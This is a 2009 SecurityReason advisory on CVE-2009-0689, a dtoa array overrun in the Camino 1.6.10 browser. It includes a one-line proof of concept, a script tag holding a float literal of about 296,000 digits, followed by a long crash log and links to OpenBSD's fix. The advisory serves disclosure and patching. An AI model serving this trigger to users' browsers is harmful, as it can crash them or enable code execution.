-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[ Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) ]
Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes
Affected Software:
Fixed in:
NOTE: Prior versions may also be affected.
Original URL:
http://securityreason.com/achievement_securityalert/76
— 0.Description —
Camino (from the Spanish word camino meaning "way", "path" or "road") is a free, open source,
GUI-based Web browser based on Mozilla's Gecko layout engine and specifically designed for the Mac
OS X operating system. In place of an XUL-based user interface used by most Mozilla-based
applications, Camino uses Mac-native Cocoa APIs, although it does not use native text boxes.
— 1. Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) —
The main problem exist in dtoa implementation. Camino has the same dtoa as Firefox, SeaMonkey,
Chrome, Opera etc.
and it is the same like SREASONRES:20090625.
http://securityreason.com/achievement_securityalert/63
but fix for SREASONRES:20090625, used by openbsd was not good.
More information about fix for openbsd and similars SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69
We can create any number of float, which will overwrite the memory. In
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and
it is possible to call 16<= elements of freelist array.
<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>
Process: Camino [153]
Path: /Volumes/Camino/Camino.app/Contents/MacOS/Camino
Identifier: org.mozilla.camino
Version: 1.6.10 (1609.09.25)
Code Type: X86 (Native)
Parent Process: launchd [92]
Date/Time: 2009-11-06 12:57:24.698 -0800
OS Version: Mac OS X 10.5.6 (9G55)
Report Version: 6
Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x000000007e33d590
Crashed Thread: 0
Thread 0 Crashed:
0 libSystem.B.dylib 0x01d7e325 tiny_malloc_from_free_list + 235
1 libSystem.B.dylib 0x01d7710d szone_malloc + 180
2 libSystem.B.dylib 0x01d77018 malloc_zone_malloc + 81
3 libSystem.B.dylib 0x01d76fac malloc + 55
4 libxpcom_core.dylib 0x00c5271d PL_DHashTableInit + 220
5 org.mozilla.camino 0x00389bac RuleHash::RuleHash(int) + 282
6 org.mozilla.camino 0x0038ae0e
nsCSSRuleProcessor::GetRuleCascade(nsPresContext*) + 146
7 org.mozilla.camino 0x0038b215
nsCSSRuleProcessor::RulesMatching(PseudoRuleProcessorData*) + 27
8 org.mozilla.camino 0x003afbd0 EnumPseudoRulesMatching(nsIStyleRuleProcessor*,
void*) + 24
9 org.mozilla.camino 0x003b0885 nsStyleSet::FileRules(int
()(nsIStyleRuleProcessor, void*), RuleProcessorData*) + 37
10 org.mozilla.camino 0x003b0c77 nsStyleSet::ResolvePseudoStyleFor(nsIContent*,
nsIAtom*, nsStyleContext*, nsICSSPseudoComparator*) + 123
11 org.mozilla.camino 0x002cc924
nsCSSFrameConstructor::ConstructRootFrame(nsIContent*, nsIFrame**) + 134
12 org.mozilla.camino 0x002f617b PresShell::InitialReflow(int, int) + 1151
13 org.mozilla.camino 0x005a90d4 nsContentSink::StartLayout(int) + 342
14 org.mozilla.camino 0x00483354 HTMLContentSink::StartLayout() + 82
15 org.mozilla.camino 0x00486cb7 HTMLContentSink::OpenBody(nsIParserNode const&)
Thread 1:
0 libSystem.B.dylib 0x01dad30a select$DARWIN_EXTSN$NOCANCEL + 10
1 libnspr4.dylib 0x00d3940e poll + 258
2 libnspr4.dylib 0x00d35cc6 PR_Poll + 134
3 org.mozilla.camino 0x000cb897 nsSocketTransportService::Poll(unsigned int*) +
99
4 org.mozilla.camino 0x000cbe75 nsSocketTransportService::Run() + 497
5 libxpcom_core.dylib 0x00c91baf nsThread::Main(void*) + 41
6 libnspr4.dylib 0x00d37309 _pt_root + 150
7 libSystem.B.dylib 0x01da7095 _pthread_start + 321
8 libSystem.B.dylib 0x01da6f52 thread_start + 34
Thread 2:
0 libSystem.B.dylib 0x01d76226 semaphore_timedwait_signal_trap + 10
1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244
2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47
3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207
4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75
5 libxpcom_core.dylib 0x00c93be2 TimerThread::Run() + 74
6 libxpcom_core.dylib 0x00c91baf nsThread::Main(void*) + 41
7 libnspr4.dylib 0x00d37309 _pt_root + 150
8 libSystem.B.dylib 0x01da7095 _pthread_start + 321
9 libSystem.B.dylib 0x01da6f52 thread_start + 34
Thread 3:
0 libSystem.B.dylib 0x01d76226 semaphore_timedwait_signal_trap + 10
1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244
2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47
3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207
4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75
5 org.mozilla.camino 0x000b539d nsIOThreadPool::ThreadFunc(void*) + 145
6 libnspr4.dylib 0x00d37309 _pt_root + 150
7 libSystem.B.dylib 0x01da7095 _pthread_start + 321
8 libSystem.B.dylib 0x01da6f52 thread_start + 34
Thread 4:
0 libSystem.B.dylib 0x01d7d3ae __semwait_signal + 10
1 libSystem.B.dylib 0x01da7d0d pthread_cond_wait$UNIX2003 + 73
2 com.apple.QuartzCore 0x052c6ab9 fe_fragment_thread + 54
3 libSystem.B.dylib 0x01da7095 _pthread_start + 321
4 libSystem.B.dylib 0x01da6f52 thread_start + 34
Thread 5:
0 libSystem.B.dylib 0x01d76226 semaphore_timedwait_signal_trap + 10
1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244
2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47
3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207
4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75
5 org.mozilla.camino 0x000d43ce nsHostResolver::GetHostToLookup(nsHostRecord**)
Thread 6:
0 libSystem.B.dylib 0x01dc56f2 select$DARWIN_EXTSN + 10
1 libSystem.B.dylib 0x01da7095 _pthread_start + 321
2 libSystem.B.dylib 0x01da6f52 thread_start + 34
Thread 7:
0 libSystem.B.dylib 0x01d76226 semaphore_timedwait_signal_trap + 10
1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244
2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47
3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207
4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75
5 org.mozilla.camino 0x000b539d nsIOThreadPool::ThreadFunc(void*) + 145
6 libnspr4.dylib 0x00d37309 _pt_root + 150
7 libSystem.B.dylib 0x01da7095 _pthread_start + 321
8 libSystem.B.dylib 0x01da6f52 thread_start + 34
Thread 0 crashed with X86 Thread State (32-bit):
eax: 0xf8051a22 ebx: 0x01d7e255 ecx: 0x07e8fca0 edx: 0x7e33d590
edi: 0x07d5c000 esi: 0x07e00000 ebp: 0xbfffe208 esp: 0xbfffe190
ss: 0x0000001f efl: 0x00010206 eip: 0x01d7e325 cs: 0x00000017
ds: 0x0000001f es: 0x0000001f fs: 0x00000000 gs: 0x00000037
cr2: 0x7e33d590
This list is not yet closed.
OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c
— 5. Credits —
Discovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.
— 6. Greets —
Infospec p_e_a pi3
— 7. Contact —
Email:
GPG:
http://securityreason.com/
http://securityreason.pl/
-----BEGIN PGP SIGNATURE-----
iEYEARECAAYFAkshevAACgkQpiCeOKaYa9aj5gCcDrfDkGIjDV2Fo+J402jTE7u3
rwYAni4FngpFFwhcsuoZjNGeeh68lJQ+
=eZDR
-----END PGP SIGNATURE-----